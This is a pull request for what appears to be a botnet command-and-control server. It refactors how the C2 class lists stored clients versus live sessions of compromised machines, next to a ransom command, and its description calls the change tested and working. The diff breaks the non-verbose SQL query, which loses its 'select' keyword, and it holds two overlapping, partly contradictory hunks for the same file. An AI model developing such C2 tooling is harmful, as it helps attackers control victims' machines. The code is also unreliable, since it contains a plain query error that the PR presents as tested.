### PR TITLE
Further separate stored clients from connected sessions

### DIFF
--- a/byob/core/database.py
+++ b/byob/core/database.py
@@ -76,14 +76,8 @@ COMMIT;
         c = globals().get('_color')
 
         if isinstance(data, dict):
-            i = data.get('id')
-            util.display(str(i).rjust(indent-3), color='reset', style='bright') if i else None
-
             for k,v in data.items():
-                if k == "id":
-                    pass
-
-                elif isinstance(v, unicode):
+                if isinstance(v, unicode):
                     try:
                         j = json.loads(v.encode())
                         self._display(j, indent+2)
@@ -131,8 +125,6 @@ COMMIT;
                 data = dict(data)
 
             if isinstance(data, dict):
-                i = data.get('id')
-                util.display(str(i).rjust(indent-1).encode(), color='reset', style='bright') if i else None
                 self._display(data, indent+2)
             else:
                 util.display(data.ljust(4  * indent).center(5 * indent).encode(), color=c, style='bright', end=' ')
@@ -201,7 +193,7 @@ COMMIT;
         :param bool display:    display output
 
         """
-        sql = "select * from tbl_sessions" if verbose else "select id, public_ip, uid, platform from tbl_sessions"
+        sql = "select * from tbl_sessions" if verbose else "public_ip, uid, platform from tbl_sessions"
         statement = self.execute(sql)
         columns = [_[0] for _ in statement.description]
         return [{k:v for (k,v) in zip(columns, rows)} for rows in statement.fetchall()]

--- a/byob/core/database.py
+++ b/byob/core/database.py
@@ -76,11 +76,14 @@ COMMIT;
         c = globals().get('_color')
 
         if isinstance(data, dict):
-            i = data.pop('id', None)
+            i = data.get('id')
             util.display(str(i).rjust(indent-3), color='reset', style='bright') if i else None
 
             for k,v in data.items():
-                if isinstance(v, unicode):
+                if k == "id":
+                    pass
+
+                elif isinstance(v, unicode):
                     try:
                         j = json.loads(v.encode())
                         self._display(j, indent+2)
@@ -128,7 +131,7 @@ COMMIT;
                 data = dict(data)
 
             if isinstance(data, dict):
-                i = data.pop('id',None)
+                i = data.get('id')
                 util.display(str(i).rjust(indent-1).encode(), color='reset', style='bright') if i else None
                 self._display(data, indent+2)
             else:

--- a/byob/server.py
+++ b/byob/server.py
@@ -220,7 +220,7 @@ class C2():
                 'usage': 'sessions',
                 'description': 'show active client sessions'},
             'clients' : {
-                'method': self.session_list,
+                'method': self.client_list,
                 'usage': 'clients',
                 'description': 'show all clients that have joined the server'},
             'shell' : {
@@ -676,7 +676,7 @@ class C2():
                 session._active.clear()
                 return self.run()
 
-    def session_list(self, verbose=True):
+    def client_list(self, verbose=True):
         """
         List currently online clients
 
@@ -691,6 +691,20 @@ class C2():
             print()
             sessions = self.database.get_sessions(verbose=verbose)
             self.database._display(sessions)
+            print()
+
+    def session_list(self):
+        """
+        List active sessions
+
+        """
+        if globals()['debug']:
+            util.display('parent={} , child={} , args={}'.format(inspect.stack()[1][3], inspect.stack()[0][3], locals()))
+        lock = self.current_session._lock if self.current_session else self._lock
+        with lock:
+            print()
+            for idx, ses in self.sessions.items():
+                self.database._display(ses.info)
             print()
 
     def session_ransom(self, args=None):
@@ -772,15 +786,15 @@ class C2():
                     if info.pop('new', False):
                         util.display("\n\n[+]", color='green', style='bright', end=' ')
                         util.display("New Connection:", color='white', style='bright', end=' ')
-                        util.display(address[0], color='white', style='normal')
-                        util.display("    Session:", color='white', style='bright', end=' ')
-                        util.display(str(session.id), color='white', style='normal')
-                        util.display("    Started:", color='white', style='bright', end=' ')
-                        util.display(time.ctime(session._created), color='white', style='normal')
                         self._count += 1
                     else:
                         util.display("\n\n[+]", color='green', style='bright', end=' ')
-                        util.display("{} reconnected".format(address[0]), color='white', style='bright', end=' ')
+                        util.display("Connection:", color='white', style='bright', end=' ')
+                    util.display(address[0], color='white', style='normal')
+                    util.display("    Session:", color='white', style='bright', end=' ')
+                    util.display(str(session.id), color='white', style='normal')
+                    util.display("    Started:", color='white', style='bright', end=' ')
+                    util.display(time.ctime(session._created), color='white', style='normal')
                     session.info = info
                     self.sessions[int(session.id)] = session
             else:


### PR DESCRIPTION
This project seems to have logic separating clients (saved in db) from sessions (connections at runtime), but it also treats them as the same. For example, connection IDs are stored in the database when a new client appears, yet there is a method to list all current connections IDs associated with a specific client. This is confusing. These inconsistencies are also causing some bugs with assigning connection IDs. 

Summary of changes:
- Session IDs are no longer stored in the client info table; instead they stay a field of the Session object, for their purpose of keeping track of connections at runtime
- The "sessions" command now shows active runtime connections with their IDs (separate from the "clients" command which keeps its old behavior of checking the DB)
- Fixed some wonky behavior with session IDs that was caused by _count only incrementing for new clients
- Reconnections now show session IDs (not necessary, but useful :yum:)

I've tested these changes on Debian Linux (x64) and everything worked fine. Sessions now feel smoother and easier to use, and the difference between clients and sessions is much clearer.